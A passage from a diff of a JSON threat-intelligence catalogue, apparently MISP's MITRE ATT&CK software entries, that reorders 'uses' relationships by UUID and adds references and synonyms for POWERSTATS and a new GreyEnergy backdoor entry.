"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17385,13 +19660,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ @@ -17400,14 +19668,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17441,7 +19716,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17455,7 +19730,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17503,13 +19778,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -17524,6 +19792,13 @@ ], "type": "uses" }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -17558,6 +19833,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b0f13390-cec7-4814-b37c-ccec01887faa", @@ -17572,10 +19854,13 @@ ], "refs": [ "https://attack.mitre.org/software/S0223", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" ], "synonyms": [ - "POWERSTATS" + "POWERSTATS", + "Powermud" ] }, "related": [ @@ -17586,27 +19871,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -17615,7 +19879,14 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17628,13 +19899,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -17643,70 +19907,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17719,12 +19920,124 @@ ], "type": "uses" }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", @@ -17761,14 +20074,14 @@ "type": "uses" }, { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17843,6 +20156,55 @@ ], "type": "uses" }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -17857,34 +20219,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ @@ -17893,21 +20227,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17940,20 +20260,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -17961,12 +20267,26 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", @@ -18010,27 +20330,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -18038,13 +20337,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ @@ -18052,13 +20344,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -18066,12 +20351,47 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", @@ -18093,6 +20413,34 @@ ] }, "related": [ + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -18107,34 +20455,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ @@ -18143,14 +20463,14 @@ "type": "uses" }, { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18191,14 +20511,14 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18254,62 +20574,6 @@ ], "type": "uses" }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ @@ -18324,12 +20588,68 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "06d735e7-1db1-4dbe-ab4b-acbe419f902b", @@ -18373,14 +20693,14 @@ "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18420,20 +20740,6 @@ ], "type": "uses" }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -18448,6 +20754,20 @@ ], "type": "uses" }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ @@ -18463,7 +20783,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18498,14 +20818,14 @@ "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18519,14 +20839,14 @@ "type": "uses" }, { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18593,27 +20913,6 @@ ] }, "related": [ - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ @@ -18621,55 +20920,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ @@ -18677,17 +20927,219 @@ ], "type": "uses" }, + { + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "86fc6f0c-86d9-473e-89f3-f50f3cb9319b", "value": "SpyDealer - S0324" }, + { + "description": "[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)", + "meta": { + "external_id": "S0342", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0342", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" + ], + "synonyms": [ + "GreyEnergy" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + 